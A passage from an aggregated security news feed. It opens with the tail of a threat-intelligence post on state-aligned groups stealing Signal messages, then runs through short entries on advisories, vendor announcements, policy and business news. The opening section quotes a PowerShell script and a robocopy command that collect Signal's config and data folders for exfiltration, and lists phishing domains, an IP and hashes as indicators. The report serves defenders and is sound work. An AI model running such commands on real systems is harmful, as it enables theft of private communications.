$file1 = $ComputerName + "_" + $frand + "sig.zip" $zipfile = $TempPath + "\" + $file1 $resfile = $RRoot + $file1 Compress-Archive -Path "C:\Users\..\AppData\Roaming\SIGNAL\config.json" -DestinationPath $zipfile Copy-Item -Path $zipfile -Destination $resfile -Force Remove-Item -Path $zipfile -Force Figure 8: PowerShell script used by Turla to exfiltrate Signal messages C:\Windows\system32\cmd.exe /C cd %appdata% && robocopy "%userprofile%\AppData\Roaming\Signal" C:\Users\Public\data\signa /S Figure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration Outlook and Implications The operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in a wider context with other trends in the threat landscape, such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activity. As reflected in wide ranging efforts to compromise Signal accounts, this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target's unlocked device. Equally important, this threat is not only limited to Signal, but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see Microsoft Threat Intelligence's recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign attempting to abuse the linked device feature to compromise WhatsApp accounts.   Potential targets of government-backed intrusion activity targeting their personal devices should adopt practices to help safeguard themselves, including: Enable screen lock on all mobile devices using a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns. Install operating system updates as soon as possible and always use the latest version of Signal and other messaging apps. Ensure Google Play Protect is enabled, which is on by default on Android devices with Google Play Services. Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play. Audit linked devices regularly for unauthorized devices by navigating to the "Linked devices" section in the application's settings. Exercise caution when interacting with QR codes and web resources purporting to be software updates, group invites, or other notifications that appear legitimate and urge immediate action. If available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device. iPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surface. aside_block ), ('btn_text', 'Listen now'), ('href', 'https://open.spotify.com/episode/3reADyxut9u4ueSPlCma8I'), ('image', )])]> Indicators of Compromise To assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users. See Table 1 for a sample of relevant indicators of compromise. Actor Indicator of Compromise Context  UNC5792 e078778b62796bab2d7ab2b04d6b01bf Example of altered group invite HTML code  add-signal-group[.]com add-signal-groups[.]com group-signal[.]com groups-signal[.]site signal-device-off[.]online signal-group-add[.]com signal-group[.]site signal-group[.]tech signal-groups-add[.]com signal-groups[.]site signal-groups[.]tech signal-security[.]online signal-security[.]site signalgroup[.]site signals-group[.]com Fake group invite phishing pages UNC4221 signal-confirm[.]site confirm-signal[.]site Device-linking instructions phishing page signal-protect[.]host Fake Signal security alert  teneta.join-group[.]online teneta.add-group[.]site group-teneta[.]online helperanalytics[.]ru group-teneta[.]online teneta[.]group group.kropyva[.]site Fake Kropyva group invites  APT44 150.107.31[.]194:18000 Dynamically generated device-linking QR code provisioned by APT44 a97a28276e4f88134561d938f60db495 b379d8f583112cad3cf60f95ab3a67fd b27ff24870d93d651ee1d8e06276fa98 WAVESIGN batch scripts  Table 1: Relevant indicators of compromise See Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned threat actors to target Signal messages. Threat Actor  Tactic  Technique UNC5792 Linked device Remote phishing operations using fake group invites to pair a victim's Signal messages to an actor-controlled device UNC4221 Linked device Remote phishing operations using fake military web applications and security alerts to pair a victim's Signal messages to an actor-controlled device APT44 Linked device Close-access physical device exploitation to pair a victim's Signal messages to an actor-controlled device Signal Android database theft Android malware (Infamous Chisel) tailored to exfiltrate Signal database files Signal Desktop database theft  Windows Batch script tailored to periodically exfiltrate recent Signal messages via Rclone Turla Signal Desktop database theft  Post-compromise activity in Windows environments UNC1151 Signal Desktop database theft  Use of Robocopy to stage Signal Desktop file directories for exfiltration Table 2: Summary of observed threat activity targeting Signal messages

https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/
Aryaka Adds AI>Observe to Unified SASE as a Service, Delivering Powerful, AI-Driven Visibility into Network Performance, Behavior and Threats
2025-02-19T12:09:11Z | 1739966951

Santa Clara, CA, February 19, 2025 – Aryaka®, the leader in and first to deliver Unified SASE as a Service, today announced the Winter ’25 release of its Aryaka Unified SASE as a Service solution. This update introduces AI>Observe to the platform, providing AI-powered observability for advanced threat detection, prevention, and analytics to drive actionable... The post Aryaka Adds AI>Observe to Unified SASE as a Service, Delivering Powerful, AI-Driven Visibility into Network Performance, Behavior and Threats appeared first on Aryaka.

https://www.aryaka.com/press/winter-2025-release-ai-observe/
How to Recognize AI Attacks and Strategies for Securing Your AI Applications
2025-02-19T07:00:00Z | 1739948400

https://www.akamai.com/blog/security/2025/feb/attacks-and-strategies-for-securing-ai-applications
Security Alert (A25-02-14): Vulnerability in Firefox
2025-02-19T04:00:00Z | 1739937600

Mozilla has published an advisory (MFSA2025-12) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-02-15): Multiple Vulnerabilities in Google Chrome
2025-02-19T04:00:00Z | 1739937600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-02-16): Multiple Vulnerabilities in OpenSSH
2025-02-19T04:00:00Z | 1739937600

OpenSSH has released a new version to address multiple vulnerabilities in various versions of OpenSSH.

https://www.govcert.gov.hk/en/alerts_detail.php
Trimble Cityworks: CVE-2025-0994
2025-02-19T00:00:00Z | 1739923200

Learn about CVE-2025-0994 affecting Trimble Cityworks products. Patch now to prevent remote code execution.

https://www.recordedfuture.com/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis
Achieving RCE in famous Japanese chat tool with an obsolete Electron feature
2025-02-19T00:00:00Z | 1739923200

Introduction Hello, I’m RyotaK (@ryotkak ), a security engineer at GMO Flatt Security Inc. A while ago, I reported a remote code execution vulnerability that chains multiple problems in Chatwork, a popular communication tool in Japan. In the report that I sent to the bug bounty platform, I used an obsolete feature of Electron to escalate to the preload context. As the vulnerability was interesting, I’m writing this article to share the details of it.

https://flatt.tech/research/posts/escaping-electron-isolation-with-obsolete-feature/
Cloud Repatriierung: Warum Unternehmen ihre Cloud-Strategien überdenken
2025-02-18T16:55:08Z | 1739897708

It’s no secret that enterprises across industries have embraced cloud-first strategies over the past few years. But now, many are starting to re-evaluate those cloud strategies. A new trend is emerging, known as cloud repatriation, where enterprises are considering shifting workloads and data back from the public cloud to on-premises or hybrid environments. The post Cloud Repatriation: Why Enterprises Are Rethinking Their Cloud Strategies appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/cloud-repatriation-why-enterprises-are-rethinking-their-cloud-strategies.html
CSE calls on Canadian organizations and critical infrastructure providers to strengthen defences on third anniversary of Russia’s invasion of Ukraine
2025-02-18T14:59:23Z | 1739890763

https://cyber.gc.ca/en/news-events/cse-calls-canadian-organizations-critical-infrastructure-providers-strengthen-defences-third-anniversary-russias-invasion-ukraine
Protect Your Critical Assets with Akamai Guardicore DNS Firewall
2025-02-18T14:00:00Z | 1739887200

Enhance your network security and protect servers, workloads, and IoT devices with Akamai Guardicore DNS Firewall.

https://www.akamai.com/blog/security/2025/feb/protect-critical-assets-with-akamai-guardicore-dns-firewall
The Market Has Spoken: Cato Networks Soars with 46% ARR Growth in 2024
2025-02-18T13:26:00Z | 1739885160

This past year was a defining one for all of us at Cato Networks and for the industry at large. The enterprise networking and security market is undergoing a seismic shift—one that we have long anticipated. The days of fragmented, bolt-on security solutions are over. The market has spoken, and it’s clear: enterprises demand a... The post The Market Has Spoken: Cato Networks Soars with 46% ARR Growth in 2024  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-soars-with-46-arr-growth-in-2024/
UK Households Lean on Credit as Cost Pressures Persist, Despite Economic Stabilisation
2025-02-18T11:48:23Z | 1739879303

James O’Donnell, director of research & consulting at TransUnion in the UK, comments on the recent UK Finance Card Spending report: “Early signs of consumer relief emerged in the latest UK Finance card spending report, but the cumulative pressures on consumer finances remain high. While total credit card spending rose by 0.2% year-on-year, outstanding balances continued their upward trajectory, increasing by 5.2% over the same period. Meanwhile, despite a modest rise in transactions, debit card spend fell slightly (0.6%) in November, which is notable given Black Friday sales fall within this period. “In terms of the good news and signs of consumer relief, consumers are continuing to make headway in reducing their monthly incurred interest on credit card debt. The percentage of balances that incur interest are down nearly a full percentage point since last year at 48.7% down from 49.5%. However, the picture is less positive in terms of reliance on credit. The continued divergence between debit and credit spend growth suggests that consumers are increasingly turning to borrowing to manage everyday expenses, even as inflationary pressures show signs of easing. “TransUnion’s Q4 2024 Consumer Pulse survey found that inflation remains a top concern for 83% of UK consumers heading into the new year. The continued growth in credit balances, alongside the high proportion of interest-incurring debt, points to the need for financial resilience measures to support consumers through uncertain economic conditions. “As households navigate the evolving landscape, financial institutions must prioritise responsible lending and data-driven decision-making. Understanding consumers’ financial health in real time will be key to ensuring sustainable borrowing habits and supporting long-term financial stability.”

https://newsroom.transunion.co.uk/uk-households-lean-on-credit-as-cost-pressures-persist-despite-economic-stabilisation/
No, you’re not fired – but beware of job termination scams
2025-02-18T10:00:00Z | 1739872800

Some employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff

https://www.welivesecurity.com/en/scams/no-youre-not-fired-beware-job-termination-scams/
Data is the Target for Cyberattacks – So Why Are You Still Only Protecting the Perimeter With Network Security?
2025-02-18T09:32:10Z | 1739871130

Ransomware recovery costs have surged to an average of $2.73 million, and the reputational damage that follows can be irreparable. And it’s not just companies paying the price – executives face personal liability for failing to protect sensitive data. So why do so many businesses continue to rely on outdated network security models that focus solely on perimeter defenses? The post Data is the Target for Cyberattacks – So Why Are You Still Only Protecting the Perimeter With Network Security? appeared first on Certes.

https://certes.ai/2025/02/18/network-security-is-not-enough/
Zero Trust DNS and DDI: Strengthening Network Security
2025-02-18T08:46:01Z | 1739868361

Zero Trust – A Must-Have Security Strategy for Modern Networks As hybrid and multi-cloud environments become the norm, traditional perimeter-based security models are no longer sufficient. The Zero Trust approach, grounded in the principle of “never trust, always verify,” replaces outdated models that assume implicit trust within network perimeters. Instead, it enforces continuous verification and… The post Zero Trust DNS and DDI: Strengthening Network Security appeared first on EfficientIP.

https://efficientip.com/blog/zero-trust-dns-and-ddi-strengthening-network-security/
Critical Vulnerability (CVE-2018-19410) Exposes 600 PRTG Instances in Bangladesh
2025-02-18T07:12:01Z | 1739862721

As part of BGD e-GOV CIRT continuous efforts to monitor emerging threats and vulnerabilities that could compromise national security, our Cyber Threat Intelligence Unit has identified 600 vulnerable PRTG instances in Bangladesh affected by CVE-2018-19410—a critical-severity vulnerability. This Local File Inclusion (LFI) and Authentication Bypass flaw is actively exploited by cybercriminals and is listed in CISA’s Known Exploited Vulnerabilities (KEV) Catalog. This vulnerability, affecting PRTG... Read More

https://www.cirt.gov.bd/cve-2018-19410-exposes-600-prtg-bd/
Setting a course for more sustainable office spaces
2025-02-17T13:00:00Z | 1739797200

The need for sustainability is everywhere, including where we work. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/setting-a-course-for-more-sustainable-office-spaces.html
Katharine Hayhoe: The most important climate equation | Starmus highlights
2025-02-17T10:00:00Z | 1739786400

The atmospheric scientist makes a compelling case for a head-to-heart-to-hands connection as a catalyst for climate action

https://www.welivesecurity.com/en/we-live-science/katharine-hayhoe-most-important-climate-equation-starmus-highlights/
ESG Watch | February 2025
2025-02-17T09:41:28Z | 1739785288

Key news in this edition: Trump’s executive orders shape the future of sustainability. US court rules against focus on ESG in retirement plan. Net-Zero Asset Managers initiative suspends activities. Editorial The ESG landscape is changing rapidly, with recent developments highlighting both setbacks and progress across different regions. From the US to Australia and Tanzania, the response to sustainability and climate-related governance is diverging, presenting both risks and opportunities for businesses worldwide. In the US, President Trump’s recent executive orders signal a clear departure from the previous administration’s pro-ESG stance. His rollback of climate policies, withdrawal from the Paris Agreement, and termination of DEI programs threaten to erode hard-fought sustainability gains. However, corporate responses have been mixed—while some firms have scaled back their commitments, others are doubling down on their ESG initiatives, recognizing long-term strategic value over short-term political shifts. The suspension of activities by the Net-Zero Asset Managers initiative (NZAMI) further complicates the ESG outlook. The withdrawal of major US financial institutions, including BlackRock, from climate-focused alliances highlights growing regulatory scrutiny and political pressure. While this raises concerns about firms backtracking on climate commitments, it also highlights the fragility of voluntary ESG pledges. Without stronger regulatory frameworks, the onus remains on companies to demonstrate genuine progress rather than treating sustainability as a branding exercise. Meanwhile, the recent Texan court ruling against ESG-focused retirement plans sets a legal precedent that could embolden further challenges to ESG integration in financial decision-making. The case against American Airlines suggests that fiduciary duty arguments could be weaponized against sustainability efforts, which adds legal uncertainty for pension fund managers and investors. In contrast, Australia has taken a decisive step forward with the rollout of mandatory climate-related financial disclosures. As of January 2025, large Australian companies are required to report climate-related risks and opportunities. By implementing a structured and phased approach, Australia is fostering corporate transparency and addressing previous inconsistencies in ESG reporting. Similarly, the Bank of Tanzania’s new climate risk reporting guidelines signal growing ESG momentum in Africa. By requiring financial institutions to integrate sustainability into governance and annual reporting, Tanzania joins other African nations in efforts on climate accountability. This move dispels the assumption that ESG regulation will remain confined to Western economies. Taken together, these developments illustrate an ESG landscape in flux. While US policy shifts may present challenges, international efforts in Australia and Tanzania demonstrate that sustainability remains a business imperative.

https://www.s-rminform.com/esg-watch/esg-watch-february-2025
Security Alert (A25-02-13): Multiple Vulnerabilities in Microsoft Edge
2025-02-17T04:00:00Z | 1739764800

Microsoft released a security update to address vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
For the U.N.’s premier climate event, a network that’s fast, secure, and efficient
2025-02-14T22:00:00Z | 1739570400

Winner of a Cisco Live Customer Award, COP29’s ICT team employed Cisco Services and products to support a critical global cause. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/for-the-u-n-premier-climate-event-a-network-that-s-fast-secure-and-efficient.html
How to Navigate Network Security in a Rapidly Evolving OT Cyber Threat Landscape
2025-02-14T15:00:00Z | 1739545200

Operational technology (OT) environments are the backbone of critical industries – electric, oil and gas, and manufacturing, and are increasingly... The post How to Navigate Network Security in a Rapidly Evolving OT Cyber Threat Landscape first appeared on Dragos.

https://www.dragos.com/blog/how-to-navigate-network-security-in-a-rapidly-evolving-ot-cyber-threat-landscape/
Chat Control vs. File Sharing
2025-02-14T14:45:55Z | 1739544355

The spectre of “law-enforcement going dark“ is on the EU agenda once again. I’ve written about the unintended consequences of states using malware to break into mobile phones to monitor communication multiple times. See here and here. Recently it became known that yet another democratic EU Member state has employed such software to spy on journalists and other civil society figures – and not on the hardened criminals or terrorists which are always cited as the reason why these methods are needed. Anyway, I want to discuss a different aspect today: the intention of various law enforcement agencies to enact legislation to force the operators of “over-the-top” (OTT) communication services (WhatsApp, Signal, iChat, Skype, …) to implement a backdoor to the end-to-end encryption feature that all modern applications have introduced over the last years. When I talked to a Belgian public prosecutor last year about that topic he said: “we don’t want a backdoor for the encryption, we want the collaboration of the operators to give us access when we ask for it” Let’s assume the law enforcement folks win the debate in the EU and chat control becomes law. How might this play out? My view on this is shaped by two thoughts: 1) Product versus service. Right now, the instant messaging platforms operate primarily as services: they run computers and software that enable the communication. They handle the authentication, the directory and the OTT equivalent of the mobile operator’s Home Location Register (HLR): the system that enables communication endpoints to find each other. Implementing all this in a server-client model certainly make sense, but it’s not the only way it can be done. The seminal text on this is Clay Shirky’s essay on ZapMail, FedEx’ attempt to build a service based on FAX machines which completely bombed because people just bought their own FAX machines, turning a prospective service into a product that operates on top of the phone network. 2) The evolution of file-sharing applications. Initially, Napster was built as service: the central Napster servers knew about the files each member of the network offered and could then act as a broker that matched file searches to clients who offered those files. On an abstract level, this is exactly what WhatApp is doing, just instead of enabling a download it is enabling texting and calls. This made Napster the obvious target for legal action: the content-owners knew exactly whom to sue. And it worked: by targeting this central broker service, the lawsuits managed to shut down this file-sharing model. But it didn’t stop file-sharing, it just changed the model how it operated. The centralized service evolved into a peer-to-peer model. Users downloaded software that built a P2P overlay network over the Internet which provided the necessary directory / search / rendezvous functions without the need for a central node. While the technology used (distributed hash tables) was pretty new, this is actually how most of the initial Internet applications work: you download (or buy) software that implements a certain protocol, configure the DNS as the directory / rendezvous function and pronto: you are part of the global network. It still works this way for e-mail and the world wide web. The spam epidemic is one of the downsides of this fully distributed approach. What does this mean for instant messaging apps? If the legislation targets the OTT services themselves, one possible counter is to de-centralize the service. Make it as thin as possible, e.g. by providing only an authentication and directory service, but refrain completely from being involved in any communication between users. The latter can be implemented with a P2P setup. This has been done before: the original Skype protocol also was heavily reliant on users acting as communication hubs. Alternatively, the communication service could split into multiple small, interconnected services. Models for this are the fediverse (the network of Mastodon instances which together implement a global social media platform), Jabber (based on the XMPP protocol) or federated Matrix instances. These all make us of the DNS to enable instance to instance communication. If user identifiers are domain-based, that’s easy to do, for phone-number based networks this is a bit trickier – regrettably ENUM didn’t take off, that would have been the perfect directory to map phone numbers to instant messaging IDs. But maybe we finally see a killer application for the blockchain: mapping identifiers to cryptographic keys in a distributed fashion is something that might actually work using that technology. So yes, it is possible that any serious government interference with OTT services might trigger the development of alternative technologies and a shift of the users to the new architecture. If the user experience is good, this could happen pretty quickly. Yes, there is Metcalfe’s law to overcome, but there are historical precedents of populations switching from one social network to another. It may be slow in the beginning, but once a tipping point is reached, it might become unstoppable. Here the analogy with file-sharing breaks down: sending copyrighted files to strangers is of questionable legality, texting with friends or calling a relative over the Internet is certainly legal. What are the next steps? If people download one of the available chat-and-call applications, maybe choosing between simple open-source implementations and fancy commercial ones, then what can law enforcement do? Make distributing those programs illegal? Make using them illegal? I cannot believe that this will work from a legal point of view. Summary Any heavy-handed interference by lawmakers into the end-to-end encryption properties of OTT service could trigger an evolutionary step in those applications with wide-reaching implications. I strongly recommend treading very lightly here: it is probably a lot better to enter a constructive discussion with the OTT service on cooperative policing of their users. After all, it is not in the operator’s interest to expose their users to fraudsters on their service. Every additional story of government abuse of surveillance makes this a harder sell.

https://www.cert.at/en/blog/2025/2/chat-control-vs-file-sharing
Unleashing Medusa: Fast and scalable smart contract fuzzing
2025-02-14T05:00:00Z | 1739509200

Introducing Medusa v1, a cutting-edge fuzzing framework designed to enhance smart contract security.

https://blog.trailofbits.com/2025/02/14/unleashing-medusa-fast-and-scalable-smart-contract-fuzzing/
Dia Internet mais Segura junta centenas de pessoas em Aveiro
2025-02-14T00:00:00Z | 1739491200

O Centro de Congressos de Aveiro foi palco das comemorações do Dia da Internet Mais Segura, celebrado no dia 11 de fevereiro de 2025. O programa incluiu mais de uma dezena de Oficinas temáticas dirigidas aos alunos da comunidade escolar do distrito, e um Seminário dedicado à Educação para a Cidadania Digital, no qual marcaram presença o Presidente da Câmara Municipal de Aveiro, Ribau Esteves e o Coordenador do Centro Nacional de Cibersegurança, Lino Santos. Com coordenação do Centro Internet Segura (CIS), esta foi a 22.ª edição da efeméride, conhecida internacionalmente como Safer Internet Day (SID), assinalada em mais de 180 países. Trata-se de uma campanha anual de sensibilização, que junta parceiros dos setores público e privado, no maior número possível de países, para promover a utilização segura e responsável das tecnologias, particularmente entre as crianças e jovens. “Aprende a ser digital” foi o lema escolhido pelo CIS para as comemorações, das quais se destaca o Seminário, transmitido online, que contribuiu, pela voz de especialistas e jovens, para refletir sobre desafios e oportunidades da cidadania digital e a capacitação dos cidadãos para uma utilização crítica, ética e responsável do ambiente digital. Na abertura do seminário, Fernanda Bonacho, docente da Escola Superior de Comunicação, do Politécnico de Lisboa, realçou a importância de “compreender a tecnologia como um espelho e um amplificador dos nossos valores sociais e políticos. “Reconhecemos que temos, cada vez mais, confiança e competências na utilização dos media digitais, mas, ao mesmo tempo, essas tecnologias estão a tornar-se cada vez mais complexas”. A keynote do seminário considera que a “educação para a cidadania digital deve servir uma participação consciente, ética e produtiva nesta complexa ecologia dos dados, que consiga evitar a discriminação e os potenciais riscos de exploração”. Na sessão de encerramento o coordenador do CNCS, Lino Santos, referiu que a tecnologia à nossa disposição e “a corrida” pelo seu domínio, traz um “quadro de ameaças cada vez mais complexo e difuso”. Considera, por isso, haver, uma “necessidade da cidadania para o digital e para a literacia digital”, através do aumento do nível de competências para lidar com segurança com estas tecnologias. Esta é a missão do Centro Internet Segura, “ajudar os nossos jovens, mas também os mais vulneráveis a ganhar as competências para lidar com as tecnologias em segurança”. Ao longo do seminário foram exibidos vídeos com mensagens de vários jovens pertencentes ao projeto Líderes Digitais do Agrupamento de Escolas de Ílhavo e do programa Anti-Bullying, bem como de um jovem voluntário do Instituto Português do Desporto e da Juventude (IPDJ). Do programa do seminário também fizeram parte dois paineis de debate, um dedicado ao tema da Cidadania Digital: Desafios e Oportunidades e o segundo no qual vários jovens responderam na primeira pessoa sobre o que consideram “Ser Cidadão Digital”.

https://dyn.cncs.gov.pt/pt/detalhe/art/135913/dia-internet-mais-segura-junta-centenas-de-pessoas-em-aveiro
Top Trends in Zero Trust Security Solutions in 2025
2025-02-13T18:51:42Z | 1739472702

As we shift into 2025, one truth becomes increasingly evident: Zero Trust (ZT) is no longer just a buzzword in the cybersecurity community; it's the foundation upon which a strong and resilient security program is built.

https://www.zentera.net/blog/zero-trust-security-solutions-trends
Distributed AI Inferencing ? The Next Generation of Computing
2025-02-13T16:00:00Z | 1739462400

https://www.akamai.com/blog/cloud/2025/feb/distributed-ai-inferencing-next-generation-of-computing
Securing OAuth Authentication Risks with AI-Driven Monitoring
2025-02-13T15:00:00Z | 1739458800

As organizations continue to integrate cloud-based services and third-party applications, OAuth authentication has become a cornerstone of modern security frameworks. However, recent cybersecurity incidents highlight a growing concern: OAuth-based vulnerabilities remain an overlooked entry point for attackers, particularly in Zero Trust environments.

https://mixmode.ai/blog/securing-oauth-authentication-risks-with-ai-driven-monitoring/
Preparing your organization for the quantum threat to cryptography (ITSAP.00.017)
2025-02-13T14:51:10Z | 1739458270

https://cyber.gc.ca/en/guidance/preparing-your-organization-quantum-threat-cryptography-itsap00017
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 06/2025
2025-02-13T14:13:46Z | 1739456026

This week, we'll talk about data phishing using the popular file-sharing service Drop-box. Other topics include the risk of data leakage from an unconfigured service, risk management in software security and current scams.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-062025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 06/2025
2025-02-13T14:13:46Z | 1739456026

This week, we'll talk about data phishing using the popular file-sharing service Drop-box. Other topics include the risk of data leakage from an unconfigured service, risk management in software security and current scams.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-062025
We’re partnering to strengthen TON’s DeFi ecosystem
2025-02-13T14:00:03Z | 1739455203

TVM Ventures has selected Trail of Bits as its preferred security partner to strengthen the TON developer ecosystem. Through this partnership, we’ll lead the development of DeFi protocol standards and provide comprehensive security services to contest-winning projects deploying on TON. TVM Ventures will host ongoing developer contests where teams can showcase innovative applications that advance […]

https://blog.trailofbits.com/2025/02/13/were-partnering-to-strengthen-tons-defi-ecosystem/
Azure RBAC Privilege Escalations: Azure VM
2025-02-13T13:20:43Z | 1739452843

Microsoft Azure provides administrators with controls to limit the actions a principal can take within the cloud environment. These actions can broadly be split into two categories: those that impact the Entra ID tenant and those that affect the Azure cloud subscription, the latter of which we will call “RBAC actions.” Prior research into Entra […] The post Azure RBAC Privilege Escalations: Azure VM appeared first on Praetorian.

https://www.praetorian.com/blog/azure-rbac-privilege-escalations-azure-vm/
Gaming or gambling? Lifting the lid on in-game loot boxes
2025-02-13T10:00:00Z | 1739440800

The virtual treasure chests and other casino-like rewards inside your children’s games may pose risks you shouldn’t play down

https://www.welivesecurity.com/en/kids-online/gaming-gambling-lifting-lid-in-game-loot-boxes/
Riasztás Microsoft termékeket érintő sérülékenységekről – 2025. február
2025-02-13T09:04:05Z | 1739437445

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2025-februar/
Introducing Akamai Managed Service for API Security
2025-02-13T08:00:00Z | 1739433600

https://www.akamai.com/blog/security/2025/feb/introducing-akamai-managed-service-for-api-security
Why FWaaS Is the Only Way Out of Endless Appliance Patching
2025-02-13T07:20:31Z | 1739431231

From Cassette Tapes to Streaming: The Evolution of Simplicity  There was a time when owning a cassette or video player came with a side gig as a repair technician. Whether it was cleaning tape heads, fixing jammed reels, or rewinding tapes, maintenance was unavoidable. With streaming services, all of that effort has become a relic... The post Why FWaaS Is the Only Way Out of Endless Appliance Patching appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-fwaas-is-the-only-way-out-of-endless-appliance-patching/
Security Alert (A25-02-12): Multiple Vulnerabilities in Google Chrome
2025-02-13T04:00:00Z | 1739419200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Search Central Live is going to New York City
2025-02-13T04:00:00Z | 1739419200

We're excited to announce that Search Central Live is coming to New York City for the first time on March 20, 2025. The Google Search team has organized events in the city several times, but this time we're bringing our main Search event to the city that never sleeps. Come and join us for a day of discussion, listening, and meeting new people.

https://developers.google.com/search/blog/2025/02/search-central-live-nyc
Inside the Scam: North Korea’s IT Worker Threat
2025-02-13T00:00:00Z | 1739404800

Learn how North Korea’s IT workers infiltrate global companies, posing cybersecurity threats, committing fraud, and supporting the regime. Discover key findings and mitigation strategies to safeguard your business.

https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat
RedMike (Salt Typhoon) Exploits Vulnerable Cisco Devices of Global Telecommunications Providers
2025-02-13T00:00:00Z | 1739404800

Discover how Chinese state-sponsored group RedMike exploited unpatched Cisco devices, targeting telecommunications providers globally. Learn about vulnerabilities CVE-2023-20198 and CVE-2023-20273, and how organizations can protect critical infrastructure.

https://www.recordedfuture.com/research/redmike-salt-typhoon-exploits-vulnerable-devices
Stimmen aus Moskau: Russian Influence Operations Target German Elections
2025-02-13T00:00:00Z | 1739404800

Discover how Russia-linked influence operations, including Doppelgänger and Operation Overload, are attempting to undermine Germany's 2025 elections. Learn about their tactics, impacts, and how to mitigate the risks to media integrity and public trust.

https://www.recordedfuture.com/research/stimmen-aus-moskau-russian-influence-operations-target-german-elections
Munich Security Conference
2025-02-13T00:00:00Z | 1739404800

Explore intelligence reports from Recorded Future's Insikt Group at the 2025 Munich Security Conference. Key topics include Taiwan invasion risk, Russian influence in German elections, RedMike exploiting Cisco devices, and North Korea’s IT worker scam.

https://www.recordedfuture.com/blog/munich-security-conference
From Geopolitics to AI, 6 Key Threat Intelligence Trends for CISOs in 2025
2025-02-13T00:00:00Z | 1739404800

Discover the latest threat intelligence outlooks for 2025, including AI-enabled phishing, SaaS attacks, and executive-targeted cyber threats. Learn key strategies to protect your organization from evolving digital risks.

https://www.recordedfuture.com/blog/6-threat-intelligence-outlooks-strategies-2025
From South America to Southeast Asia: The Fragile Web of REF7707
2025-02-13T00:00:00Z | 1739404800

REF7707 targeted a South American foreign ministry using novel malware families. Inconsistent evasion tactics and operational security missteps exposed additional adversary-owned infrastructure.

https://www.elastic.co/security-labs/fragile-web-ref7707
You've Got Malware: FINALDRAFT Hides in Your Drafts
2025-02-13T00:00:00Z | 1739404800

During a recent investigation (REF7707), Elastic Security Labs discovered new malware targeting a foreign ministry. The malware includes a custom loader and backdoor with many features including using Microsoft’s Graph API for C2 communications.

https://www.elastic.co/security-labs/finaldraft
GreyNoise Observes Active Exploitation of PAN-OS Authentication Bypass Vulnerability (CVE-2025-0108)
2025-02-13T00:00:00Z | 1739404800

GreyNoise has observed active exploitation attempts targeting a newly disclosed authentication bypass vulnerability, CVE-2025-0108, affecting Palo Alto Networks PAN-OS. This high-severity flaw allows unauthenticated attackers to execute specific PHP scripts, potentially leading to unauthorized access to vulnerable systems.

https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-pan-os-authentication-bypass-vulnerability-cve-2025-0108
Cisco Reports Second Quarter Earnings
2025-02-12T21:05:00Z | 1739394300

Cisco reported second quarter revenue of $14.0 billion, net income on a generally accepted accounting principles (GAAP) basis of $2.4 billion or $0.61 per share, and non-GAAP net income of $3.8 billion or $0.94 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/cisco-reports-second-quarter-earnings.html
Mobile Security for SMBs: A Protection Solution Tailored for Small Teams
2025-02-12T17:09:48Z | 1739380188

